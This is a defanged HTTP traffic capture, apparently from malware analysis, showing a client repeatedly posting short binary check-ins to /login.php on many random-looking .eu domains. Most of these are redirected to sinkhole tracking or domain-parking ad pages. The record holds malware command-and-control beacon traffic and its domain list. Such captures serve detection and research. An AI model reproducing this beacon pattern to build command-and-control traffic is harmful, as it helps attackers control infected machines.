friendly error page -->..<!-- a padding to disable MSIE and <<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fodakyhijyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/fodakyhijyv.eu

Set-Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryleryqacic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.ryleryqacic.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.ryleryqaci
c.eu..Vary: Accept-Encoding..

GET /367a5a5db4f631d0cc1ad3c79b85b63a HTTP/1.1

Host: xsso.nojejecebuw.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:21 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu
19..Landed nojejecebuw.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vofozymufok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/vofozymufok.eu

Set-Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.vocakemenir.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:33 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;vocakemenir.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'vocakemenir.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0OS40NzY2OmM4MTZkOGU2M2E1MDlhZjBiNzgzYjE
zODk2NDA4ZDk0OWE3MGUzYWFmOTM2NDEzZmZiZDlkNjI3ZjZhYzk4Y2Y6NTY0ZWUzMzU3N
DYxNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzNTcyYmE1fHx8MTQ0ODAxMDU0OS
40ODI3fGE3MjY1Y2MxYjYwYzJkYzRjNjEzNzA3ZmExMzZmOTk5ODg0MTA1MGN8fHx8fDF8
fHwwfDU2NGVlMzM1MTM1MzVmM2E0MThiNTAwYXx8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.qetuluvolos.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:14 GMT

Server: Apache

Set-Cookie: vsid=914vr1955561546911765; expires=Wed, 18-Nov-2020 09:09:14 GMT; path=/; domain=ww92.qetuluvolos.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqYVKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=93

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqY
VKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.qetuluvolos.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.qetuluvolos.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.qetuluvolos.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qetuluvol
os.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

GET /1acef55da687a834a563e6c7f72341c6 HTTP/1.1

Host: xsso.kemocujufys.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu
19..Landed kemocujufys.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.pupujeguper.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:29 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;pupujeguper.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'pupujeguper.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0NS4wNTQ3OjQyZjQwZTBkYTEyMWMwNTJmNzFiYmZ
jNzQ4YWU4M2Q3NzUwMWRlMmU1Y2U1ZmVjNjMyMDc4MjAyN2Q2OTUzNGU6NTY0ZWUzMzEwZ
DY1ZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMzMDdlNzc5fHx8MTQ0ODAxMDU0NS
4wNjMxfGM4Y2RlZmIxNWYyMWNhM2EwNTI1M2YwNzUyM2QwMzg1ZDViMmU1NjR8fHx8fDF8
fHwwfDU2NGVlMzMxODhmYmNlNjA5MjhiNGEzMnx8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryhuzilywax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:40 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.ryhuzilywax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:40 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.ryhuzilywax.e
u..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryhuzilywax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:42 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.ryhuzilywax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:42 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.ryhuzilywax.e
u..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kevedorozup.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.kevedorozup.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.kevedorozup.e
u..Vary: Accept-Encoding..

GET /domain/nopegymozow.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu

Location: hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65

3e..Go hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65..0.
.

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.digusebyvad.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:19:08 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;digusebyvad.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'digusebyvad.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU4NC43Nzg2OjQzYzZiNDhjNDEyMjdkMTVkYzM3MTk
yYzYwYmRiZGFjYWZiZDQzMTA5MDk2NmEzOWM3Y2IyNmM0ZTJmOWM3YjA6NTY0ZWUzNThiZ
TE4Yg==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1OGJjZTBhfHx8MTQ0ODAxMDU4NC
43ODIyfDAxOWQ2MDBhYmU5MmRhM2Y2ODc2YjA3ZWEyZDkzMzYyYWJhNTYwZmV8fHx8fDF8
fHwwfDU2NGVlMzU4MWQzNTNkZTAwOThiNWYxNXx8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

GET /56531f80c1f00a0d974859702a1ece40 HTTP/1.1

Host: xsso.fodakyhijyv.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu
19..Landed fodakyhijyv.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: puregivytoh.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:33 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.puregivytoh.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:33 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.puregivyto
h.eu..Vary: Accept-Encoding..

GET /domain/ciliqikytec.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu

Location: hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38

3e..Go hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38..0.
.

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.qexofyqihid.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:07 GMT

Server: Apache

Set-Cookie: vsid=923vr1955561476019761; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.qexofyqihid.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=46

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLb
npqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.qexofyqihid.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qexofyqih
id.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvejujolec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/lyvejujolec.eu

Set-Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pupujeguper.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.pupujeguper.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.pupujegupe
r.eu..Vary: Accept-Encoding..

GET /519227042aaa4d45b3d8d04c6d6182c2 HTTP/1.1

Host: xsso.vofozymufok.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu
19..Landed vofozymufok.eu<br>..0..

GET /bd3d82839c544969cd7e5b6b151fa69e HTTP/1.1

Host: xsso.qeqinuqypoq.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu
19..Landed qeqinuqypoq.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xugiqonenuz.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

Connection: close

Set-Cookie: jsessionid=909bfe917d8125c576546cf2675a42ec; Expires=Fri, 18 Nov 2022 09:09:18 GMT

Date: Fri, 20 Nov 2015 09:09:18 GMT

Content-Length: 0

Content-Type: text/plain; charset=utf-8

GET /domain/lyvejujolec.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu

Location: hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8

3e..Go hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8..0.
.

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekikyvutic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:48 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.qekikyvutic.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:48 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.qekikyvuti
c.eu..Vary: Accept-Encoding..

